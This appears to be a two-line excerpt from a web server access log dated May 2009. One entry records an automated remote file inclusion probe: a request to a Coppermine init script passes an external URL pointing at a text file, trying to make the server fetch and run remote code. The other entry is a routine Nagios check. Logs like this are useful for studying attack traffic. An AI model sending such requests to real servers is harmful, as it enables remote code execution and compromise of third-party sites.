93.188.112.35 - - [29/May/2009:05:36:05 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.taichilyon.fr/forum/styles/prosilver/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:05:36:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
